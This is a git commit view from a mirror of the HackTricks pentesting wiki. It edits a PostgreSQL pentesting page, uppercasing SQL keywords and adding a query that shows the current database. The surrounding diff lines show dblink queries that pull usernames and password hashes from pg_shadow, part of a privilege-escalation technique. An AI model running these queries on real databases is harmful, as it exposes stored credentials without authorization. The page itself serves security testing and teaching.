0x22bb/hacktricks
1
2
Fork 0
mirror of https://github.com/carlospolop/hacktricks.git synced 2023-12-14 19:12:55 +01:00
Code Releases Activity

Merge pull request #696 from DeveloperOl/master

Browse source 
Update pentesting-postgresql.md
This commit is contained in:
Carlos Polop 2023-08-29 20:47:50 +02:00 committed by GitHub
parent 02139b4168 95f20afc82
commit fae6f50ce8
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23
1 changed files with 6 additions and 3 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

9
network-services-pentesting/pentesting-postgresql.md
View file

@ -47,7 +47,10 @@ psql -h localhost -d <database_name> -U <User> #Password will be prompted
\du+ # Get users roles
# Get current user
Select user;
SELECT user;
# Get current database
SELECT current_catalog;
# List schemas
SELECT schema_name,schema_owner FROM information_schema.schemata;
@ -545,7 +548,7 @@ SELECT * FROM dblink('host=127.0.0.1
user=someuser
password=supersecret
dbname=somedb',
'Select usename,passwd from pg_shadow')
'SELECT usename,passwd from pg_shadow')
RETURNS (result TEXT);
```
@ -563,7 +566,7 @@ If you have the password of a user with more privileges, but the user is not all
SELECT * FROM dblink('host=127.0.0.1
user=someuser
dbname=somedb',
'Select usename,passwd from pg_shadow')
'SELECT usename,passwd from pg_shadow')
RETURNS (result TEXT);
```